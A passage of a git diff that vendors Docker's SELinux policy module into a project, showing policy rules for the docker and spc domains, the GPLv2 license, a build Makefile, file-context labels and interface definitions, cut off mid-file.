+corenet_udp_sendrecv_generic_if(docker_t) +corenet_udp_sendrecv_generic_node(docker_t) +corenet_udp_sendrecv_all_ports(docker_t) +corenet_udp_bind_generic_node(docker_t) +corenet_udp_bind_all_ports(docker_t) + +files_read_config_files(docker_t) +files_dontaudit_getattr_all_dirs(docker_t) +files_dontaudit_getattr_all_files(docker_t) + +fs_read_cgroup_files(docker_t) +fs_read_tmpfs_symlinks(docker_t) +fs_search_all(docker_t) +fs_getattr_all_fs(docker_t) + +storage_raw_rw_fixed_disk(docker_t) + +auth_use_nsswitch(docker_t) +auth_dontaudit_getattr_shadow(docker_t) + +init_read_state(docker_t) +init_status(docker_t) + +logging_send_audit_msgs(docker_t) +logging_send_syslog_msg(docker_t) + +miscfiles_read_localization(docker_t) + +mount_domtrans(docker_t) + +seutil_read_default_contexts(docker_t) +seutil_read_config(docker_t) + +sysnet_dns_name_resolve(docker_t) +sysnet_exec_ifconfig(docker_t) + +optional_policy(` + rpm_exec(docker_t) + rpm_read_db(docker_t) + rpm_exec(docker_t) +') + +optional_policy(` + fstools_domtrans(docker_t) +') + +optional_policy(` + iptables_domtrans(docker_t) +') + +optional_policy(` + openvswitch_stream_connect(docker_t) +') + +# +# lxc rules +# + +allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace }; + +allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms }; + +allow docker_t self:netlink_route_socket rw_netlink_socket_perms; +allow docker_t self:netlink_audit_socket create_netlink_socket_perms; +allow docker_t self:unix_dgram_socket { create_socket_perms sendto }; +allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto }; + +allow docker_t docker_var_lib_t:dir mounton; +allow docker_t docker_var_lib_t:chr_file mounton; +can_exec(docker_t, docker_var_lib_t) + +kernel_dontaudit_setsched(docker_t) +kernel_get_sysvipc_info(docker_t) +kernel_request_load_module(docker_t) +kernel_mounton_messages(docker_t)
+kernel_mounton_all_proc(docker_t) +kernel_mounton_all_sysctls(docker_t) +kernel_unlabeled_entry_type(spc_t) +kernel_unlabeled_domtrans(docker_t, spc_t) + +dev_getattr_all(docker_t) +dev_getattr_sysfs_fs(docker_t) +dev_read_urand(docker_t) +dev_read_lvm_control(docker_t) +dev_rw_sysfs(docker_t) +dev_rw_loop_control(docker_t) +dev_rw_lvm_control(docker_t) + +files_getattr_isid_type_dirs(docker_t) +files_manage_isid_type_dirs(docker_t) +files_manage_isid_type_files(docker_t) +files_manage_isid_type_symlinks(docker_t) +files_manage_isid_type_chr_files(docker_t) +files_manage_isid_type_blk_files(docker_t) +files_exec_isid_files(docker_t) +files_mounton_isid(docker_t) +files_mounton_non_security(docker_t) +files_mounton_isid_type_chr_file(docker_t) + +fs_mount_all_fs(docker_t) +fs_unmount_all_fs(docker_t) +fs_remount_all_fs(docker_t) +files_mounton_isid(docker_t) +fs_manage_cgroup_dirs(docker_t) +fs_manage_cgroup_files(docker_t) +fs_relabelfrom_xattr_fs(docker_t) +fs_relabelfrom_tmpfs(docker_t) +fs_read_tmpfs_symlinks(docker_t) +fs_list_hugetlbfs(docker_t) + +term_use_generic_ptys(docker_t) +term_use_ptmx(docker_t) +term_getattr_pty_fs(docker_t) +term_relabel_pty_fs(docker_t) +term_mounton_unallocated_ttys(docker_t) + +modutils_domtrans_insmod(docker_t) + +systemd_status_all_unit_files(docker_t) +systemd_start_systemd_services(docker_t) + +userdom_stream_connect(docker_t) +userdom_search_user_home_content(docker_t) +userdom_read_all_users_state(docker_t) +userdom_relabel_user_home_files(docker_t) +userdom_relabel_user_tmp_files(docker_t) +userdom_relabel_user_tmp_dirs(docker_t) + +optional_policy(` + gpm_getattr_gpmctl(docker_t) +') + +optional_policy(` + dbus_system_bus_client(docker_t) + init_dbus_chat(docker_t) + init_start_transient_unit(docker_t) + + optional_policy(` + systemd_dbus_chat_logind(docker_t) + systemd_dbus_chat_machined(docker_t) + ') + + optional_policy(` + firewalld_dbus_chat(docker_t) + ') +') + +optional_policy(` + udev_read_db(docker_t) +') + 
+optional_policy(` + unconfined_domain(docker_t) + # unconfined_typebounds(docker_t) +') + +optional_policy(` + virt_read_config(docker_t) + virt_exec(docker_t) + virt_stream_connect(docker_t) + virt_stream_connect_sandbox(docker_t) + virt_exec_sandbox_files(docker_t) + virt_manage_sandbox_files(docker_t) + virt_relabel_sandbox_filesystem(docker_t) + # for lxc + virt_transition_svirt_sandbox(docker_t, system_r) + virt_mounton_sandbox_file(docker_t) +# virt_attach_sandbox_tun_iface(docker_t) + allow docker_t svirt_sandbox_domain:tun_socket relabelfrom; + virt_sandbox_entrypoint(docker_t) +') + +tunable_policy(`docker_connect_any',` + corenet_tcp_connect_all_ports(docker_t) + corenet_sendrecv_all_packets(docker_t) + corenet_tcp_sendrecv_all_ports(docker_t) +') + +######################################## +# +# spc local policy +# +allow spc_t { docker_var_lib_t docker_share_t }:file entrypoint; +role system_r types spc_t; + +domtrans_pattern(docker_t, docker_share_t, spc_t) +domtrans_pattern(docker_t, docker_var_lib_t, spc_t) +allow docker_t spc_t:process { setsched signal_perms }; +ps_process_pattern(docker_t, spc_t) +allow docker_t spc_t:socket_class_set { relabelto relabelfrom }; +filetrans_pattern(docker_t, docker_var_lib_t, docker_share_t, dir, "overlay") + +optional_policy(` + systemd_dbus_chat_machined(spc_t) +') + +optional_policy(` + dbus_chat_system_bus(spc_t) +') + +optional_policy(` + unconfined_domain_noaudit(spc_t) +') + +optional_policy(` + virt_transition_svirt_sandbox(spc_t, system_r) + virt_sandbox_entrypoint(spc_t) +') + +######################################## +# +# docker_auth local policy +# +allow docker_auth_t self:fifo_file rw_fifo_file_perms; +allow docker_auth_t self:unix_stream_socket create_stream_socket_perms; +dontaudit docker_auth_t self:capability net_admin; + +docker_stream_connect(docker_auth_t) + +manage_dirs_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +manage_files_pattern(docker_auth_t, 
docker_plugin_var_run_t, docker_plugin_var_run_t) +manage_sock_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +manage_lnk_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +files_pid_filetrans(docker_auth_t, docker_plugin_var_run_t, { dir file lnk_file sock_file }) + +domain_use_interactive_fds(docker_auth_t) + +kernel_read_net_sysctls(docker_auth_t) + +auth_use_nsswitch(docker_auth_t) + +files_read_etc_files(docker_auth_t) + +miscfiles_read_localization(docker_auth_t) + +sysnet_dns_name_resolve(docker_auth_t) + +######################################## +# +# OL7.2 systemd selinux update +# systemd_machined local policy +# +allow systemd_machined_t self:capability { dac_override setgid sys_admin sys_chroot sys_ptrace }; +allow systemd_machined_t systemd_unit_file_t:service { status start }; +allow systemd_machined_t self:unix_dgram_socket create_socket_perms; + +manage_dirs_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t) +manage_files_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t) +manage_lnk_files_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t) +init_pid_filetrans(systemd_machined_t, systemd_machined_var_run_t, dir, "machines") + +manage_dirs_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t) +manage_files_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t) +manage_lnk_files_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t) +init_var_lib_filetrans(systemd_machined_t, systemd_machined_var_lib_t, dir, "machines") + +kernel_dgram_send(systemd_machined_t) +# This is a bug, but need for now. 
+kernel_read_unlabeled_state(systemd_machined_t) + +init_dbus_chat(systemd_machined_t) +init_status(systemd_machined_t) + +userdom_dbus_send_all_users(systemd_machined_t) + +term_use_ptmx(systemd_machined_t) + +optional_policy(` + dbus_connect_system_bus(systemd_machined_t) + dbus_system_bus_client(systemd_machined_t) +') + +optional_policy(` + docker_read_share_files(systemd_machined_t) + docker_spc_read_state(systemd_machined_t) +') + +optional_policy(` + virt_dbus_chat(systemd_machined_t) + virt_sandbox_read_state(systemd_machined_t) + virt_signal_sandbox(systemd_machined_t) + virt_stream_connect_sandbox(systemd_machined_t) + virt_rw_svirt_dev(systemd_machined_t) + virt_getattr_sandbox_filesystem(systemd_machined_t) + virt_read_sandbox_files(systemd_machined_t) +') + + diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE new file mode 100644 index 0000000000..5b6e7c66c2 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE @@ -0,0 +1,340 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc. + 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Library General Public License instead.) You can apply it to +your programs, too. 
+ + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. 
+ + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. 
You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. 
+ +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. 
However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. 
+You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. 
If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. 
+ + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Library General +Public License instead of this License. 
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile new file mode 100644 index 0000000000..1bdc695afe --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile @@ -0,0 +1,16 @@ +TARGETS?=docker +MODULES?=${TARGETS:=.pp.bz2} +SHAREDIR?=/usr/share + +all: ${TARGETS:=.pp.bz2} + +%.pp.bz2: %.pp + @echo Compressing $^ -\> $@ + bzip2 -9 $^ + +%.pp: %.te + make -f ${SHAREDIR}/selinux/devel/Makefile $@ + +clean: + rm -f *~ *.tc *.pp *.pp.bz2 + rm -rf tmp *.tar.gz diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc new file mode 100644 index 0000000000..467d659604 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc @@ -0,0 +1,18 @@ +/root/\.docker gen_context(system_u:object_r:docker_home_t,s0) + +/usr/bin/dockerd -- gen_context(system_u:object_r:docker_exec_t,s0) + +/usr/lib/systemd/system/docker.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) + +/etc/docker(/.*)? gen_context(system_u:object_r:docker_config_t,s0) + +/var/lib/docker(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) + +/var/run/docker\.pid -- gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker\.sock -s gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker-client(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) + +/var/lib/docker/init(/.*)? 
gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/containers/.*/hosts gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/containers/.*/hostname gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/.*/config\.env gen_context(system_u:object_r:docker_share_t,s0) diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if new file mode 100644 index 0000000000..ca075c05c5 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if @@ -0,0 +1,461 @@ + +## The open-source application container engine. + +######################################## +## +## Execute docker in the docker domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_domtrans',` + gen_require(` + type docker_t, docker_exec_t; + ') + + corecmd_search_bin($1) + domtrans_pattern($1, docker_exec_t, docker_t) +') + +######################################## +## +## Execute docker in the caller domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_exec',` + gen_require(` + type docker_exec_t; + ') + + corecmd_search_bin($1) + can_exec($1, docker_exec_t) +') + +######################################## +## +## Search docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_search_lib',` + gen_require(` + type docker_var_lib_t; + ') + + allow $1 docker_var_lib_t:dir search_dir_perms; + files_search_var_lib($1) +') + +######################################## +## +## Execute docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_exec_lib',` + gen_require(` + type docker_var_lib_t; + ') + + allow $1 docker_var_lib_t:dir search_dir_perms; + can_exec($1, docker_var_lib_t) +') + +######################################## +## +## Read docker lib files. +## +## +## +## Domain allowed access. 
+## +## +# +interface(`docker_read_lib_files',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + read_files_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Read docker share files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_share_files',` + gen_require(` + type docker_share_t; + ') + + files_search_var_lib($1) + read_files_pattern($1, docker_share_t, docker_share_t) +') + +######################################## +## +## Manage docker lib files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_manage_lib_files',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t) + manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Manage docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_manage_lib_dirs',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Create objects in a docker var lib directory +## with an automatic type transition to +## a specified private type. +## +## +## +## Domain allowed access. +## +## +## +## +## The type of the object to create. +## +## +## +## +## The class of the object to be created. +## +## +## +## +## The name of the object being created. +## +## +# +interface(`docker_lib_filetrans',` + gen_require(` + type docker_var_lib_t; + ') + + filetrans_pattern($1, docker_var_lib_t, $2, $3, $4) +') + +######################################## +## +## Read docker PID files. +## +## +## +## Domain allowed access. 
+## +## +# +interface(`docker_read_pid_files',` + gen_require(` + type docker_var_run_t; + ') + + files_search_pids($1) + read_files_pattern($1, docker_var_run_t, docker_var_run_t) +') + +######################################## +## +## Execute docker server in the docker domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_systemctl',` + gen_require(` + type docker_t; + type docker_unit_file_t; + ') + + systemd_exec_systemctl($1) + init_reload_services($1) + systemd_read_fifo_file_passwd_run($1) + allow $1 docker_unit_file_t:file read_file_perms; + allow $1 docker_unit_file_t:service manage_service_perms; + + ps_process_pattern($1, docker_t) +') + +######################################## +## +## Read and write docker shared memory. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_rw_sem',` + gen_require(` + type docker_t; + ') + + allow $1 docker_t:sem rw_sem_perms; +') + +####################################### +## +## Read and write the docker pty type. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_use_ptys',` + gen_require(` + type docker_devpts_t; + ') + + allow $1 docker_devpts_t:chr_file rw_term_perms; +') + +####################################### +## +## Allow domain to create docker content +## +## +## +## Domain allowed access. 
+## +## +# +interface(`docker_filetrans_named_content',` + + gen_require(` + type docker_var_lib_t; + type docker_share_t; + type docker_log_t; + type docker_var_run_t; + type docker_home_t; + ') + + files_pid_filetrans($1, docker_var_run_t, file, "docker.pid") + files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock") + files_pid_filetrans($1, docker_var_run_t, dir, "docker-client") + files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init") + userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker") +') + +######################################## +## +## Connect to docker over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_stream_connect',` + gen_require(` + type docker_t, docker_var_run_t; + ') + + files_search_pids($1) + stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t) +') + +######################################## +## +## Connect to SPC containers over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_spc_stream_connect',` + gen_require(` + type spc_t, spc_var_run_t; + ') + + files_search_pids($1) + files_write_all_pid_sockets($1) + allow $1 spc_t:unix_stream_socket connectto; +') + + +######################################## +## +## All of the rules required to administrate +## an docker environment +## +## +## +## Domain allowed access. 
+## +## +# +interface(`docker_admin',` + gen_require(` + type docker_t; + type docker_var_lib_t, docker_var_run_t; + type docker_unit_file_t; + type docker_lock_t; + type docker_log_t; + type docker_config_t; + ') + + allow $1 docker_t:process { ptrace signal_perms }; + ps_process_pattern($1, docker_t) + + admin_pattern($1, docker_config_t) + + files_search_var_lib($1) + admin_pattern($1, docker_var_lib_t) + + files_search_pids($1) + admin_pattern($1, docker_var_run_t) + + files_search_locks($1) + admin_pattern($1, docker_lock_t) + + logging_search_logs($1) + admin_pattern($1, docker_log_t) + + docker_systemctl($1) + admin_pattern($1, docker_unit_file_t) + allow $1 docker_unit_file_t:service all_service_perms; + + optional_policy(` + systemd_passwd_agent_exec($1) + systemd_read_fifo_file_passwd_run($1) + ') +') + +interface(`domain_stub_named_filetrans_domain',` + gen_require(` + attribute named_filetrans_domain; + ') +') + +interface(`lvm_stub',` + gen_require(` + type lvm_t; + ') +') +interface(`staff_stub',` + gen_require(` + type staff_t; + ') +') +interface(`virt_stub_svirt_sandbox_domain',` + gen_require(` + attribute svirt_sandbox_domain; + ') +') +interface(`virt_stub_svirt_sandbox_file',` + gen_require(` + type svirt_sandbox_file_t; + ') +') +interface(`fs_dontaudit_remount_tmpfs',` + gen_require(` + type tmpfs_t; + ') + + dontaudit $1 tmpfs_t:filesystem remount; +') +interface(`dev_dontaudit_list_all_dev_nodes',` + gen_require(` + type device_t; + ') + + dontaudit $1 device_t:dir list_dir_perms; +') +interface(`kernel_unlabeled_entry_type',` + gen_require(` + type unlabeled_t; + ') + + domain_entry_file($1, unlabeled_t) +') +interface(`kernel_unlabeled_domtrans',` + gen_require(` + type unlabeled_t; + ') + + read_lnk_files_pattern($1, unlabeled_t, unlabeled_t) + domain_transition_pattern($1, unlabeled_t, $2) + type_transition $1 unlabeled_t:process $2; +') +interface(`files_write_all_pid_sockets',` + gen_require(` + attribute pidfile; + ') + + allow $1 
